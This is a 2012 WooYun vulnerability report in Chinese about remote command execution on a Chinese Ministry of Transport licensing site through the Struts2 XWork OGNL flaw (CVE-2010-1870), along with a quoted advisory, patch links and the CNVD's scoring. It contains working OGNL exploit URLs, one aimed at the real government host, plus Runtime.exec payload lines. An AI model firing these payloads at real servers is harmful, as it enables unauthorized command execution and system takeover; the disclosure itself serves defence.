漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-05168
漏洞标题:国家交通运输部某业务分站远程命令执行漏洞
相关厂商:国家交通运输部
漏洞作者: Xeyes
提交时间:2012-03-10 15:51
修复时间:2012-04-24 15:51
公开时间:2012-04-24 15:51
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-03-10: 细节已通知厂商并且等待厂商处理中
2012-03-14: 厂商已经确认,细节仅向厂商公开
2012-03-24: 细节向核心白帽子及相关领域专家公开
2012-04-03: 细节向普通白帽子公开
2012-04-13: 细节向实习白帽子公开
2012-04-24: 细节向公众公开
简要描述:
中华人民共和国交通运输部-行政许可网上办理平台存在3Apache Struts2 XWork绕过安全限制执行任意命令漏洞,利用此漏洞可获取系统root权限。
详细说明:
http://xkpt.moc.gov.cn/default/index.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew java.lang.Boolean("false")))&(asdf)(('\u0023rt.exec("命令执行")')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
漏洞说明引至绿盟:
http://www.nsfocus.net/vulndb/15431
Apache Struts2 XWork绕过安全限制执行任意命令漏洞
发布日期:2010-07-09
更新日期:2010-07-15
受影响系统:
OpenSymphony XWork < 2.2.0
Apache Group Struts < 2.2.0
描述:CVE ID: CVE-2010-1870
XWork是一个命令模式框架,用于支持Struts 2及其他应用。
XWork处理用户请求参数数据时存在漏洞,远程攻击者可以利用此漏洞在系统上执行任意命令。
Struts2中WebWork框架使用XWork基于HTTP参数名执行操作和调用,将每个HTTP参数名处理为OGNL(对象图形导航语言)语句,而OGNL将:
user.address.city=Bishkek&user['favoriteDrink']=kumys
转换为:
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
这是通过ParametersInterceptor来执行的,使用用户提供的HTTP参数调用ValueStack.setValue()。
除了获取和设置属性外,OGNL还支持其他一些功能:
* 方法调用:foo()
* 静态方式调用: @java.lang.System@exit(1)
* 构建函数调用:new MyClass()
* 处理上下文变量:#foo = new MyClass()
由于HTTP参数名为OGNL语句,为了防范攻击者通过HTTP参数调用任意方式,XWork使用了以下两个变量保护方式的执行:
* OgnlContext的属性xwork.MethodAccessor.denyMethodExecution(默认设置为true)
* SecurityMemberAccess私有字段allowStaticMethodAccess(默认设置为false)
为了方便开发人员访问各种常用的对象,XWork提供了一些预定义的上下文变量:
* #application
* #session
* #request
* #parameters
* #attr
* #context
* #_memberAccess
* #root
* #this
* #_typeResolver
* #_classResolver
* #_traceEvaluations
* #_lastEvaluation
* #_keepLastEvaluation
这些变量代表各种服务器端对象。为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值:
#_memberAccess['allowStaticMethodAccess'] = true
#foo = new java .lang.Boolean("false")
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec('mkdir /tmp/PWNED')
<*来源:Meder Kydyraliev (bugtraq@web.areopag.net)
链接:http://secunia.com/advisories/32495/
http://www.exploit-db.com/exploits/14360/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
建议:厂商补丁:
Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://svn.apache.org/viewvc?view=revision&revision=956389
漏洞证明:
修复方案:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://svn.apache.org/viewvc?view=revision&revision=956389
版权声明:转载请注明来源 Xeyes@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2012-03-14 16:12
厂商回复:
CNVD确认漏洞存在,不过由于内部网络问题暂未复现确认远程连接情况。
由于涉及重点保障目标(子站),反馈确认较为谨慎。感谢xeyes.
CNVD对该漏洞评分如下:
基本得分CVSS:(AV:R/AC:L/Au:NR/C:C/A:C/I:C/B:N) score:10.00(高危)
技术难度系数:1.0(一般,依据通用漏洞找到的个案)
影响危害系数:1.2(一般,子站非主站)
CNVD综合评分:10.00*1.0*1.2=12
最新状态:
暂无